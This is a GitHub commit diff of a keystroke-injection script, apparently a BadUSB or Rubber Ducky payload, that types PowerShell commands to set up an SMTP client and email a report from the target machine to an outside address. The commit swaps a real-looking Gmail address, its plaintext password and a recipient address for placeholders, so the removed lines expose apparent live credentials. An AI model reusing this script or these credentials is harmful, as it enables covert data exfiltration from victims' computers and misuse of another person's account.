Update script.txt

This commit is contained in:
Joel Serna Moreno 2018-05-23 19:58:42 +02:00 committed by GitHub
parent 4a17d75eb5
commit a543057750
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -55,7 +55,7 @@ STRING $SMTPInfo.EnableSsl = $true
DELAY 500 DELAY 500
ENTER ENTER
DELAY 500 DELAY 500
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('crashbboy1@gmail.com', 'bboy21102012') STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('mail', 'password')
DELAY 500 DELAY 500
ENTER ENTER
DELAY 500 DELAY 500
@ -63,10 +63,10 @@ STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
DELAY 500 DELAY 500
ENTER ENTER
DELAY 500 DELAY 500
STRING $ReportEmail.From = 'crashbboy1@gmail.com' STRING $ReportEmail.From = 'mail'
ENTER ENTER
DELAY 500 DELAY 500
STRING $ReportEmail.To.Add('joelsernamoreno@gmail.com') STRING $ReportEmail.To.Add('mail')
DELAY 500 DELAY 500
ENTER ENTER
DELAY 500 DELAY 500